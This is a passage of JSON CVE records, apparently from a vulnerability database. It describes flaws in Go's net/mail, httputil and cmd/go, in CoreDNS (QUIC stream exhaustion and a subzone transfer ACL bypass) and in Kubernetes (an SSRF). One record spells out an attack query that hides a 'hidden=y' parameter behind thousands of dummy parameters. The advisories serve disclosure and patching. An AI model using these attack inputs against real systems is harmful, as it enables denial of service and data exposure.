"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:hummingbird:1"
],
"defaultStatus": "affected",
"product": "Red Hat Hardened Images",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_ai"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift AI (RHOAI)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_cluster_manager_cli:1"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Cluster Manager CLI",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift:4"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Container Platform 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_data_foundation:4"
],
"defaultStatus": "affected",
"product": "Red Hat Openshift Data Foundation 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_devspaces:3"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Dev Spaces",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:devworkspace"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Dev Workspaces Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_distributed_tracing:3"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift distributed tracing 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:windows_machine_config"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift for Windows Containers",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_gitops:1"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift GitOps",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:container_native_virtualization:4"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Virtualization 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openstack:18.0"
],
"defaultStatus": "affected",
"product": "Red Hat OpenStack Platform 18.0",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:quay:3"
],
"defaultStatus": "affected",
"product": "Red Hat Quay 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_interconnect:1"
],
"defaultStatus": "affected",
"product": "Red Hat Service Interconnect 1",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_interconnect:2"
],
"defaultStatus": "affected",
"product": "Red Hat Service Interconnect 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:trusted_artifact_signer:1"
],
"defaultStatus": "affected",
"product": "Red Hat Trusted Artifact Signer",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_security_profiles_operator:1"
],
"defaultStatus": "affected",
"product": "Security Profiles Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:zero_trust_workload_identity_manager:1"
],
"defaultStatus": "affected",
"product": "Zero Trust Workload Identity Manager",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:zero_trust_workload_identity_manager:0"
],
"defaultStatus": "affected",
"product": "Zero Trust Workload Identity Manager - Tech Preview",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openstack:16.2"
],
"defaultStatus": "unaffected",
"product": "Red Hat OpenStack Platform 16.2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openstack:17.1"
],
"defaultStatus": "unaffected",
"product": "Red Hat OpenStack Platform 17.1",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:gatekeeper:3"
],
"defaultStatus": "unknown",
"product": "Gatekeeper 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:multicluster_engine"
],
"defaultStatus": "unknown",
"product": "Multicluster Engine for Kubernetes",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:multicluster_globalhub"
],
"defaultStatus": "unknown",
"product": "Multicluster Global Hub",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:acm:2"
],
"defaultStatus": "unknown",
"product": "Red Hat Advanced Cluster Management for Kubernetes 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unknown",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:edge_manager:1"
],
"defaultStatus": "unknown",
"product": "Red Hat Edge Manager 1",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux_ai:3"
],
"defaultStatus": "unknown",
"product": "Red Hat Enterprise Linux AI (RHEL AI) 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:lightspeed_for_runtimes:1"
],
"defaultStatus": "unknown",
"product": "Red Hat Lightspeed for Runtimes Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:satellite:6"
],
"defaultStatus": "unknown",
"product": "Red Hat Satellite 6",
"vendor": "Red Hat"
}
],
"datePublic": "2026-05-07T19:41:18.615Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in the `net/mail` package within the Go standard library. A remote attacker could provide specially crafted, pathological email addresses. When these malformed email addresses are parsed by the `consumePhrase` function, it can lead to excessive resource consumption due to quadratic string concatenation, resulting in a Denial of Service (DoS) condition."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1046",
"description": "Creation of Immutable Text Using String Concatenation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-07-03T12:05:10.689Z",
"orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"shortName": "redhat-SADP"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2026-42499"
},
{
"name": "RHBZ#2467809",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467809"
},
{
"tags": [
"x_sadp-csaf-vex"
],
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-42499.json"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:34364"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33120"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33123"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33142"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33150"
}
],
"solutions": [
{
"lang": "en",
"value": "RHSA-2026:34364: Logging Subsystem for Red Hat OpenShift 6.4"
},
{
"lang": "en",
"value": "RHSA-2026:33574: Red Hat Developer Hub 1.9"
},
{
"lang": "en",
"value": "RHSA-2026:33120: Red Hat OpenShift Service Mesh 3.0"
},
{
"lang": "en",
"value": "RHSA-2026:33123: Red Hat OpenShift Service Mesh 3.1"
},
{
"lang": "en",
"value": "RHSA-2026:33142: Red Hat OpenShift Service Mesh 3.2"
},
{
"lang": "en",
"value": "RHSA-2026:33150: Red Hat OpenShift Service Mesh 3.3"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-05-07T20:00:51.685Z",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2026-05-07T19:41:18.615Z",
"value": "Made public."
}
],
"title": "net/mail: golang: net/mail: Denial of Service via pathological email address parsing",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability."
}
],
"x_adpType": "supplier",
"x_generator": {
"engine": "sadp-cli 1.0.0"
}
}
],
"cna": {
"affected": [
{
"collectionURL": "https://pkg.go.dev",
"defaultStatus": "unaffected",
"packageName": "net/mail",
"product": "net/mail",
"programRoutines": [
{
"name": "addrParser.consumePhrase"
},
{
"name": "AddressParser.Parse"
},
{
"name": "AddressParser.ParseList"
},
{
"name": "Header.AddressList"
},
{
"name": "ParseAddress"
},
{
"name": "ParseAddressList"
}
],
"vendor": "Go standard library",
"versions": [
{
"lessThan": "1.25.10",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"lessThan": "1.26.3",
"status": "affected",
"version": "1.26.0-0",
"versionType": "semver"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Pathological inputs could cause DoS through consumePhrase when parsing an email address according to RFC 5322."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-407: Inefficient Algorithmic Complexity",
"lang": "en"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-07T19:41:18.615Z",
"orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"shortName": "Go"
},
"references": [
{
"url": "https://go.dev/issue/78987"
},
{
"url": "https://go.dev/cl/771520"
},
{
"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
},
{
"url": "https://pkg.go.dev/vuln/GO-2026-4977"
}
],
"title": "Quadratic string concatenation in consumePhrase in net/mail"
}
},
"cveMetadata": {
"assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"assignerShortName": "Go",
"cveId": "CVE-2026-42499",
"datePublished": "2026-05-07T19:41:18.615Z",
"dateReserved": "2026-04-28T00:21:12.791Z",
"dateUpdated": "2026-07-03T12:05:10.689Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-47950 (GCVE-0-2025-47950)
Vulnerability from cvelistv5 – Published: 2025-06-06 17:32 – Updated: 2025-06-06 21:27- CWE-770 - Allocation of Resources Without Limits or Throttling
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-47950",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-06-06T18:40:34.748230Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-06-06T18:42:01.227Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "coredns",
"vendor": "coredns",
"versions": [
{
"status": "affected",
"version": "\u003c 1.12.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "CoreDNS is a DNS server that chains plugins. In versions prior to 1.12.2, a Denial of Service (DoS) vulnerability exists in the CoreDNS DNS-over-QUIC (DoQ) server implementation. The server previously created a new goroutine for every incoming QUIC stream without imposing any limits on the number of concurrent streams or goroutines. A remote, unauthenticated attacker could open a large number of streams, leading to uncontrolled memory consumption and eventually causing an Out Of Memory (OOM) crash \u2014 especially in containerized or memory-constrained environments. The patch in version 1.12.2 introduces two key mitigation mechanisms: `max_streams`, which caps the number of concurrent QUIC streams per connection with a default value of `256`; and `worker_pool_size`, which Introduces a server-wide, bounded worker pool to process incoming streams with a default value of `1024`. This eliminates the 1:1 stream-to-goroutine model and ensures that CoreDNS remains resilient under high concurrency. Some workarounds are available for those who are unable to upgrade. Disable QUIC support by removing or commenting out the `quic://` block in the Corefile, use container runtime resource limits to detect and isolate excessive memory usage, and/or monitor QUIC connection patterns and alert on anomalies."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-06-06T21:27:05.841Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/coredns/coredns/security/advisories/GHSA-cvx7-x8pj-x2gw",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-cvx7-x8pj-x2gw"
},
{
"name": "https://github.com/coredns/coredns/commit/efaed02c6a480ec147b1f799aab7cf815b17dfe1",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coredns/coredns/commit/efaed02c6a480ec147b1f799aab7cf815b17dfe1"
},
{
"name": "https://datatracker.ietf.org/doc/html/rfc9250",
"tags": [
"x_refsource_MISC"
],
"url": "https://datatracker.ietf.org/doc/html/rfc9250"
},
{
"name": "https://github.com/quic-go/quic-go",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/quic-go/quic-go"
},
{
"name": "https://www.usenix.org/conference/usenixsecurity23/presentation/botella",
"tags": [
"x_refsource_MISC"
],
"url": "https://www.usenix.org/conference/usenixsecurity23/presentation/botella"
}
],
"source": {
"advisory": "GHSA-cvx7-x8pj-x2gw",
"discovery": "UNKNOWN"
},
"title": "CoreDNS Vulnerable to DoQ Memory Exhaustion via Stream Amplification"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-47950",
"datePublished": "2025-06-06T17:32:30.218Z",
"dateReserved": "2025-05-14T10:32:43.531Z",
"dateUpdated": "2025-06-06T21:27:05.841Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2026-39825 (GCVE-0-2026-39825)
Vulnerability from cvelistv5 – Published: 2026-05-07 19:41 – Updated: 2026-05-08 21:30- CWE-444 - Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Go standard library | net/http/httputil |
Affected:
0 , < 1.25.10
(semver)
Affected: 1.26.0-0 , < 1.26.3 (semver) |
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2026-39825",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-08T16:46:43.329507Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-08T21:30:08.872Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://pkg.go.dev",
"defaultStatus": "unaffected",
"packageName": "net/http/httputil",
"product": "net/http/httputil",
"programRoutines": [
{
"name": "cleanQueryParams"
},
{
"name": "ReverseProxy.ServeHTTP"
}
],
"vendor": "Go standard library",
"versions": [
{
"lessThan": "1.25.10",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"lessThan": "1.26.3",
"status": "affected",
"version": "1.26.0-0",
"versionType": "semver"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ReverseProxy can forward queries containing parameters not visible to Rewrite functions. When used with a Rewrite function, or a Director function which parses query parameters, ReverseProxy sanitizes the forwarded request to remove query parameters which are not parsed by url.ParseQuery. ReverseProxy does not take ParseQuery\u0027s limit on the total number of query parameters (controlled by GODEBUG=urlmaxqueryparams=N) into account. This can permit ReverseProxy to forward a request containing a query parameter that is not visible to the Rewrite function. For example, the query \"a1=x\u0026a2=x\u0026...\u0026a10000=x\u0026hidden=y\" can forward the parameter \"hidden=y\" while hiding it from the proxy\u0027s Rewrite function."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-444: Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
"lang": "en"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-07T19:41:18.453Z",
"orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"shortName": "Go"
},
"references": [
{
"url": "https://go.dev/cl/770541"
},
{
"url": "https://go.dev/issue/78948"
},
{
"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
},
{
"url": "https://pkg.go.dev/vuln/GO-2026-4976"
}
],
"title": "ReverseProxy forwards queries with more than urlmaxqueryparams parameters in net/http/httputil"
}
},
"cveMetadata": {
"assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"assignerShortName": "Go",
"cveId": "CVE-2026-39825",
"datePublished": "2026-05-07T19:41:18.453Z",
"dateReserved": "2026-04-07T18:13:03.527Z",
"dateUpdated": "2026-05-08T21:30:08.872Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-33489 (GCVE-0-2026-33489)
Vulnerability from cvelistv5 – Published: 2026-05-05 19:13 – Updated: 2026-05-05 19:43- CWE-863 - Incorrect Authorization
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-33489",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-05T19:43:02.806824Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T19:43:06.361Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-h8mm-c463-wjq3"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "coredns",
"vendor": "coredns",
"versions": [
{
"status": "affected",
"version": "\u003c 1.14.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "CoreDNS is a DNS server that chains plugins. In versions prior to 1.14.3, the transfer plugin can select the wrong ACL stanza when both a parent zone and a more-specific subzone are configured. The longestMatch() function in plugin/transfer/transfer.go uses a lexicographic string comparison instead of an actual longest-suffix match to select the winning zone. As a result, a permissive parent-zone transfer rule can override a restrictive subzone rule depending on zone name ordering (e.g., \"example.org.\" \u003e \"a.example.org.\" lexicographically). This allows an unauthorized remote client to perform AXFR/IXFR for the subzone and retrieve its full zone contents. This issue has been fixed in version 1.14.3."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-863",
"description": "CWE-863: Incorrect Authorization",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T19:13:48.461Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/coredns/coredns/security/advisories/GHSA-h8mm-c463-wjq3",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-h8mm-c463-wjq3"
},
{
"name": "https://github.com/coredns/coredns/releases/tag/v1.14.3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.3"
}
],
"source": {
"advisory": "GHSA-h8mm-c463-wjq3",
"discovery": "UNKNOWN"
},
"title": "CoreDNS transfer plugin subzone ACL bypass via lexicographic zone comparison"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-33489",
"datePublished": "2026-05-05T19:13:48.461Z",
"dateReserved": "2026-03-20T16:16:48.971Z",
"dateUpdated": "2026-05-05T19:43:06.361Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-42501 (GCVE-0-2026-42501)
Vulnerability from cvelistv5 – Published: 2026-05-07 19:41 – Updated: 2026-05-08 15:48- CWE-347 - Improper Verification of Cryptographic Signature
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Go toolchain | cmd/go |
Affected:
0 , < 1.25.10
(semver)
Affected: 1.26.0-0 , < 1.26.3 (semver) |
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2026-42501",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-08T15:48:05.053316Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-347",
"description": "CWE-347 Improper Verification of Cryptographic Signature",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-08T15:48:47.404Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://pkg.go.dev",
"defaultStatus": "unaffected",
"packageName": "cmd/go",
"product": "cmd/go",
"vendor": "Go toolchain",
"versions": [
{
"lessThan": "1.25.10",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"lessThan": "1.26.3",
"status": "affected",
"version": "1.26.0-0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Mundur (https://github.com/M0nd0R)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A malicious module proxy can exploit a flaw in the go command\u0027s validation of module checksums to bypass checksum database validation. This vulnerability affects any user using an untrusted module proxy (GOMODPROXY) or checksum database (GOSUMDB). A malicious module proxy can serve altered versions of the Go toolchain. When selecting a different version of the Go toolchain than the currently installed toolchain (due to the GOTOOLCHAIN environment variable, or a go.work or go.mod with a toolchain line), the go command will download and execute a toolchain provided by the module proxy. A malicious module proxy can bypass checksum database validation for this downloaded toolchain. Since this vulnerability affects the security of toolchain downloads, setting GOTOOLCHAIN to a fixed version is not sufficient. You must upgrade your base Go toolchain. The go tool always validates the hash of a toolchain before executing it, so fixed versions will refuse to execute any cached, altered versions of the toolchain. The go tool trusts go.sum files to contain accurate hashes of the current module\u0027s dependencies. A malicious proxy exploiting this vulnerability to serve an altered module will have caused an incorrect hash to be recorded in the go.sum. Users who have configured a non-trusted GOPROXY can determine if they have been affected by running \"rm go.sum ; go mod tidy ; go mod verify\", which will revalidate all dependencies of the current module. The specific flaw in more detail: The go command consults the checksum database to validate downloaded modules, when a module is not listed in the go.sum file. It verifies that the module hash reported by the checksum database matches the hash of the downloaded module. If, however, the checksum database returns a successful response that contains no entry for the module, the go command incorrectly permitted validation to succeed. A module proxy may mirror or proxy the checksum database, in which case the go command will not connect to the checksum database directly. Checksums reported by the checksum database are cryptographically signed, so a malicious proxy cannot alter the reported checksum for a module. However, a proxy which returns an empty checksum response, or a checksum response for an unrelated module, could cause the go command to proceed as if a downloaded module has been validated."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-347: Improper Verification of Cryptographic Signature",
"lang": "en"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-07T19:41:19.691Z",
"orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"shortName": "Go"
},
"references": [
{
"url": "https://go.dev/cl/775321"
},
{
"url": "https://go.dev/issue/79070"
},
{
"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
},
{
"url": "https://pkg.go.dev/vuln/GO-2026-4984"
}
],
"title": "Malicious module proxy can bypass checksum database in cmd/go"
}
},
"cveMetadata": {
"assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"assignerShortName": "Go",
"cveId": "CVE-2026-42501",
"datePublished": "2026-05-07T19:41:19.691Z",
"dateReserved": "2026-04-28T00:21:12.791Z",
"dateUpdated": "2026-05-08T15:48:47.404Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-13281 (GCVE-0-2025-13281)
Vulnerability from cvelistv5 – Published: 2025-12-14 21:27 – Updated: 2025-12-15 16:26- CWE-918 - Server-Side Request Forgery (SSRF)
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Kubernetes | Kubernetes |
Affected:
v1.30.0 , ≤ v1.30.14
(custom)
Affected: v1.31.0 , ≤ v1.31.14 (custom) Affected: v1.32.0 , ≤ v1.32.9 (custom) Affected: v1.33.0 , ≤ v1.33.5 (custom) Affected: v1.34.0 , ≤ v1.34.1 (custom) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-12-14T22:05:27.154Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/12/01/4"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-13281",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-12-15T16:26:52.505631Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-12-15T16:26:59.485Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Kubernetes",
"vendor": "Kubernetes",
"versions": [
{
"lessThanOrEqual": "v1.30.14",
"status": "affected",
"version": "v1.30.0",
"versionType": "custom"
},
{
"lessThanOrEqual": "v1.31.14",
"status": "affected",
"version": "v1.31.0",
"versionType": "custom"
},
{
"lessThanOrEqual": "v1.32.9",
"status": "affected",
"version": "v1.32.0",
"versionType": "custom"
},
{
"lessThanOrEqual": "v1.33.5",
"status": "affected",
"version": "v1.33.0",
"versionType": "custom"
},
{
"lessThanOrEqual": "v1.34.1",
"status": "affected",
"version": "v1.34.0",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cdiv\u003e\u003cspan style=\"background-color: transparent;\"\u003eA half-blind Server Side Request Forgery (SSRF) vulnerability exists in kube-controller-manager when using the in-tree Portworx StorageClass. This vulnerability allows authorized users to leak arbitrary information from unprotected endpoints in the control plane\u2019s host network (including link-local or loopback services). \u003c/span\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e"
}
],
"value": "A half-blind Server Side Request Forgery (SSRF) vulnerability exists in kube-controller-manager when using the in-tree Portworx StorageClass. This vulnerability allows authorized users to leak arbitrary information from unprotected endpoints in the control plane\u2019s host network (including link-local or loopback services)."
}
],
"impacts": [
{
"capecId": "CAPEC-664",
"descriptions": [
{
"lang": "en",
